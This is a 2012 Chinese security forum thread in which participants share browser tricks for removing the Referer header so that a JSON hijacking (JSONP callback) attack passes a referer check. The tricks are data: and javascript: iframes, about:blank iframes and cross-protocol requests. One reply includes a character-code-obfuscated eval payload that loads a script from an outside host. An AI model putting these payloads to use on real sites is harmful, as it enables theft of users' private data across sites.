json hijack如何丢掉referer

  • A+
所属分类:WooYun-Zone

</script>

func(str){

  alert(str)

}

</script>

<script src=http://www.xxx.com/xxx.cgi?callback=func ></script>

这种的攻击,如果http://www.xxx.com/xxx.cgi?callback=func 之针对referer 为 xxx.com域或者referer为空的才能出数据。如何绕过?

目前已知的是用一些跨协议的方法,比如https等,有更好的方法么?

  1. 1#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-08-08 01:54

    自己javascript构造get或post试试呢

  2. 2#

    piao2010 | 2012-08-08 09:41

    Ajax是不行的,再往底层一点去,据说WinHttp可以。

  3. 3#

    piao2010 | 2012-08-08 09:45

    另外再引入一个脚本(语言任意,能构造HTTP请求即可),把相关参数传入,构造的HTTP请求里字段就随便玩了。

  4. 4#

    xsser | 2012-08-08 10:05

    必须浏览器里一层找到方法 好像没有特别好的 用media player?

  5. 5#

    Sogili (.) 长短短 (.) | 2012-08-08 10:19

    <iframe src="data:text/html,<script src=http://www.baidu.com></script>">
    http://jsbin.com/eduyid/
    不过IE不支持:(

  6. 6#

    请叫我大神 | 2012-08-08 11:25

    @Sogili 是啊,就是想找个通用的方法

  7. 7#

    gainover | 2012-08-08 12:56

    <iframe id=”aa” src=””></iframe>
    <script>
    document.getElementById(“aa”).src=’javascript:”<html><body>wooyun.org<scr’+’ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr’+’ipt></body></html>”‘;
    </script>

  8. 8#

    gainover | 2012-08-08 12:56

    = = 上面代码好像没显示完整。。。

    <iframe id="aa" src=""></iframe>
    <script>
    document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
    </script>

  9. 9#

    _Evil (科普是一种公益行为) | 2012-08-08 12:56

    看热闹学习东西

  10. 10#

    gainover | 2012-08-08 12:58

    原理是利用 xxx.src=’javascript:”HTML代码的方式”‘; 可以去掉refer

  11. 11#

    _Evil (科普是一种公益行为) | 2012-08-08 12:59

    @gainover 你已经超越神了。。。 轻松的绕过 0.0 妙

  12. 12#

    p.z | 2012-08-08 13:14

    @gainover

  13. 13#

    lanz | 2012-08-08 14:29

    @gainover  表示IE下还是有referer啊

  14. 14#

    xsjswt | 2012-08-08 14:31

    @xsser 无码无真相,球media player的

  15. 15#

    Zvall (ฏ๎ฏด้้้้้็็็็็้้้้้็็็็็้) | 2012-08-08 14:34

    围观!!!!!!!

  16. 16#

    Sogili (.) 长短短 (.) | 2012-08-08 14:37

    @lanz
    <iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>
    这样呢?

  17. 17#

    xsser | 2012-08-08 14:38

    @gainover 我要送你乌云币!

  18. 18#

    gainover | 2012-08-08 15:05

    @lanz Wo zheli zhuabao meiyOu refer a…..

  19. 19#

    Sogili (.) 长短短 (.) | 2012-08-08 15:07

    @gainover 我这也有,但用我在楼上留的代码就没有:(

  20. 20#

    gainover | 2012-08-08 15:21

    @lanz @Sogili IE几呢? 我IE8 试的是没 refer的 。。

  21. 21#

    insight-labs | 2012-08-08 15:23

    @请叫我大神 ftp很好用,火狐不支持,配合@Sogili 的方法做个判断,差不多了!

  22. 22#

    Sogili (.) 长短短 (.) | 2012-08-08 15:26

    @gainover IE8

  23. 23#

    rayh4c | 2012-08-08 15:34

    about:blank页发起的请求没referer

  24. 24#

    gainover | 2012-08-08 15:35

    @Sogili = = 这么奇怪, 难道是某个补丁补掉了?

  25. 25#

    请叫我大神 | 2012-08-08 16:01

    @rayh4c show me the code,wtf

  26. 26#

    also (阿里山的姑娘没水冲凉) | 2012-08-08 16:17

    @gainover 膜拜大牛

  27. 27#

    rayh4c | 2012-08-08 16:38

    @请叫我大神 src等于空,都是about:blank页,空白页,在空白页里发起请求当然没referer,关键在于此。

  28. 28#

    Sogili (.) 长短短 (.) | 2012-08-08 16:58

    @rayh4c = =  如果write了就会有referer

  29. 29#

    rayh4c | 2012-08-08 17:18

    @Sogili write会有是DOM对象关联了about:blank页的父窗口的原因,可以找个非about:blank页用这些方法试试,应该会有referer。

  30. 30#

    Sogili (.) 长短短 (.) | 2012-08-08 17:20

    <iframe src="" id=x></iframe>
    <script defer>
    x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>';
    </script>

  31. 31#

    rayh4c | 2012-08-08 17:30

    @Sogili – -!! 我的意思是你可以找个正常网站用伪协议把下面的代码注进去,肯定会有referer

    javascript:’<script src=http://www.baidu.com><\/script>’

    你这个代码如果是在非about:blank页肯定会有referer,用DOM调就有父子窗口关系了。

  32. 32#

    Sogili (.) 长短短 (.) | 2012-08-08 17:34

    @rayh4c 我这测试是没有:)

  33. 33#

    Sogili (.) 长短短 (.) | 2012-08-08 17:37

    @rayh4c write有,innerHTML无 json hijack如何丢掉referer

  34. 34#

    rayh4c | 2012-08-08 17:53

    @Sogili 确实没有,X动态添加的还是about:blank,Y页write后就不是about:blank了。

    <iframe src=”” id=x></iframe>
    <script defer>
    x.document.body.innerHTML=’-<script defer>alert(\’x:\’+window.parent.x.location)<\/script>’;
    </script>

    <iframe src=”” id=y></iframe>
    <script defer>
    y.document.write(‘-<script defer>alert(\’y:\’+window.parent.y.location)<\/script>’);
    </script>

  35. 35#

    Sogili (.) 长短短 (.) | 2012-08-08 18:08

    @rayh4c 嗯,的确

  36. 36#

    gainover | 2012-08-08 22:59

    @Sogili 回寝室后,又测试了一下, 经过测试,这样写没refer。 看来这里不能用JS再动态调用一次,只能直接<script>插入了。

  37. 37#

    lanz | 2012-08-10 10:15

    @Sogili @gainover  伺候好了IE,ff又不干了,此事难两全哪,还是直接用https省事

  38. 38#

    啤酒 (xx) | 2012-08-10 23:41

    要是想拿到返回数据喃?

  39. 39#

    啤酒 (xx) | 2012-08-10 23:51

    @Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg 头像猜拿到的?